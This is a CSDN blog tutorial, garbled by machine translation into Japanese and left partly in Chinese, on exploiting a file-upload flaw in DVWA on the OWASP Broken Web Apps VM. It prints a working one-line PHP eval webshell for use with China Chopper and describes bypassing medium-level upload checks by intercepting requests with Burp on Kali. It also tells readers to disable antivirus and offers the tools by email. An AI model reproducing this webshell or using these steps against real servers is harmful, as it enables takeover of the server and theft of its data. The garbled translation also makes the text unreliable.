アップロードの脆弱性----それを読んだ後、あなたはハッカー(中国包丁とカーリー)です

1.実験環境

ターゲットドローンは:OWASP_Broken_Web_Apps_VM_1.2
ダウンロード
私たちが必要中国菜刀kali、これら2つのツールのすべてのウイルス対策ソフトウェアをオフ、または中国のチョッパーは、調和のとれたウイルス対策ソフトウェアかもしれません。
原則

1、文件上传(File Upload)是大部分Web应用都具备的功能,例如用户上传附件、修改头像、分享图片/视频等
2、正常的文件一般是文档、图片、视频等,Web应用收集之后放入后台存储,需要的时候再调用出来返回
3、如果恶意文件如PHP、ASP等执行文件绕过Web应用,并顺利执行,则相当于黑客直接拿到了Webshell
4、一旦黑客拿到Webshell,则可以拿到Web应用的数据,删除Web文件,本地提权,进一步拿下整个服务器甚至内网
5、SQL注入攻击的对象是数据库服务,文件上传漏洞主要攻击Web服务,实际渗透两种相结合,达到对目标的深度控制

2.低セーフモード

まず、仮想マシンとターゲットドローンを開く必要がありますし、IPアドレスを表示します
ここに画像を挿入説明

root@owaspbwa:~# ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 16436 qdisc noqueue state UNKNOWN 
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
    inet6 ::1/128 scope host 
       valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UNKNOWN qlen 1000
    link/ether 00:0c:29:b2:da:ea brd ff:ff:ff:ff:ff:ff
    inet 192.168.13.144/24 brd 192.168.13.255 scope global eth0
    inet6 fe80::20c:29ff:feb2:daea/64 scope link 
       valid_lft forever preferred_lft forever

IP見つけた後、私たちは、ページの訪問に192.168.13.144開く
ここに画像を挿入説明
ここに画像を挿入説明
ここに画像を挿入説明
ここに画像を挿入説明
ここに画像を挿入説明
我々はポニー(馬)書かれているファイルのアップロード
そうポニーと呼ばれる単一のライン、そこにあるファイル
ポニー:ポニーは、また、トロイの木馬単語として知られているが、その全体のシェルコード唯一ラインの量、典型的にはシステム機能を実行する
マレーシア:防止/検出する侵入系に符号量と機能ポニーよりも、暗号化された形で一般的に二次、セキュリティファイアウォール

<?php @eval($_POST['yjssjm']);?>
格式不要动,只需要改''里面的东西就行了,yjssjm是你定义的密码,与下面使用的中国菜刀密码保持一致就行

その後、我々は表示し、テストファイルを作成するために、ターゲットドローンの上に行ってきました

root@owaspbwa:~# cd /owaspbwa/owaspbwa-svn/var/www/dvwa/hackable/uploads
root@owaspbwa:/owaspbwa/owaspbwa-svn/var/www/dvwa/hackable/uploads# ls
shell.php
root@owaspbwa:/owaspbwa/owaspbwa-svn/var/www/dvwa/hackable/uploads# echo 'aaaa' > a.txt   #创建一个测试文件
root@owaspbwa:/owaspbwa/owaspbwa-svn/var/www/dvwa/hackable/uploads# ls
a.txt  shell.php

ここに画像を挿入説明
ここに画像を挿入説明
ここに画像を挿入説明
ここに画像を挿入説明
オープンポイントに私たちのダブルクリックを設定した後
ここに画像を挿入説明
、我々はA.TXT削除し、その後削除されたサーバー上に表示し、サーバー上のA.TXTファイルを発見したために、それは攻撃へのアップロードの脆弱性を使用することです。
ここに画像を挿入説明

3.セーフモード

我々は、我々がアップロードに失敗したことがわかり、この時点アップロードし、その後、メディアセキュリティに変更し
** **ボールドスタイル
ここに画像を挿入説明
ここに画像を挿入説明
、それを過ぎて前方にその変更の種類、その後、私たちのメッセージの傍受を訪問し、我々は代理カーリーとして、このツールを使用する必要があり、この時間を。
オープンカーリー、デフォルトのユーザー名はroot、パスワードはtoorされ
ここに画像を挿入説明
ここに画像を挿入説明
、その後、我々は、私は次の----受け入れ右下隅のポイントとなっているスタートげっぷが行に入力------
ここに画像を挿入説明
ここに画像を挿入説明
その後、我々は、Webページを設定する必要があり、すべてのアクセスが変わります192.168.13.145に
ここに画像を挿入説明
ここに画像を挿入説明
し、我々は再び、この時間カーリーは、我々はアップロードされた情報の上に表示されますアップロードし
ここに画像を挿入説明
ここに画像を挿入説明
、我々は成功を収めてDVWAを見て
ここに画像を挿入説明
次のちょうど上記のように、我々は中国の包丁にサーバーを攻撃することができます。
あなたがダウンロードした場合は、小さなパートナーカーリーと悪い中国の包丁は、コメント欄に自分の電子メールを残すことができます
悪いに経済的損失を引き起こした場合、我々はすべての試みは、自分のコンピュータ上で十分に説得します。

44元記事公開 ウォン127と同様に ビューに20000 +を

おすすめ

転載: blog.csdn.net/baidu_38803985/article/details/105375025